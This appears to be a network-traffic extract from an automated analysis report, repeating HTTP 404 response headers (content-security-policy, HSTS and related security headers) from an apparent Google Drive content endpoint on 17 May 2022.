                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:48 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-yH/yM9guq+Yj14iv7/jAxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:48 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-neXl10HRig2Xm5PqfBTwKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:48 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-MhGhlgCwcoqo6dYeYV/u/Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:49 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-KHDjoEj7fxYk2/8dIo/OuQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:49 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-UaIsK1dRXNTxqsFygui3jg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:49 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-w4ZmLuo4O1BWadlvJsa2cA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:49 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-+vEljsBveIGPO6YfMSYE3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:49 GMTStrict-Transport-Security: max-age=31536000Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Content-Security-Policy: script-src 'report-sample' 'nonce-+1pDUm9jgHRYXEZxP4WPKg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:49 GMTStrict-Transport-Security: max-age=31536000Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-2y+bWwiHQgTg/WQF8lnPHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:49 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-C4VnkrGxDMqQ0zz/WtrY7A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:49 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-7t6by/HqkAVsCmKYOikUgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:50 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-M2X3p3RI4yrbmEYvQDl3KQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:50 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-7NHcQsvWetbdm/R+x5yBZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:50 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-us0Coy2gjwJ6aND95T24Zg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:50 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-pml4D7x9wGtUAbv9R89hbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:50 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-eWl3E+ez7O2JtfJjRj89lQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:50 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-lojL4gOzDVOFiuoBa743Dw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:51 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-7HsWGaWkgM39FrtGAw+UEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:51 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-7HcKiAtCM2oiBXjLF6jdBw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
